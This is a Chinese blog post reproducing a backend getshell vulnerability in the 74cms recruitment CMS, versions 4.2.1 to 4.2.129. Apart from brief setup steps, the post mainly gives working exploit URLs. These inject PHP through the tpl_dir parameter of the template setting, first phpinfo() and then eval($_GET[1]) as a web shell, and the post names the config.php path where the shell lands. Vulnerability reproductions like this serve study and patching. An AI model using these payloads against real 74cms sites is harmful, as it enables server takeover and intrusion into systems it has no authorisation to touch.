74cms v4.2.1-v4.2.129-后台getshell漏洞复现

0x00 影响范围

v4.2.1-v4.2.129

0x01 环境搭建

1. 先去官网下载 骑士人才系统基础版(安装包)

2.将下载好的包进行安装

 

0x02 复现过程

当前版本v4.2.111

 

点加工具,点击风格模板

 

Payload:
http://127.0.0.1/74cms/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',phpinfo(),'

shell地址:
http://127.0.0.1/74cms/Application/Home/Conf/config.php

直接访问

5.png

后端代码

GETSHELL

http://127.0.0.1/74cms/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',eval($_GET[1]),'

 

后端代码

http://127.0.0.1/74cms/Application/Home/Conf/config.php?1=phpinfo();

0x03 漏洞分析

请移步http://www.xinziyou123.com/%e6%96%b0%e7%89%8874cms-v4-2-1-v4-2-129-%e5%90%8e%e5%8f%b0getshell%e6%bc%8f%e6%b4%9e/

 

posted @ 2020-06-28 17:49  浅笑996  阅读(962)  评论(0编辑  收藏  举报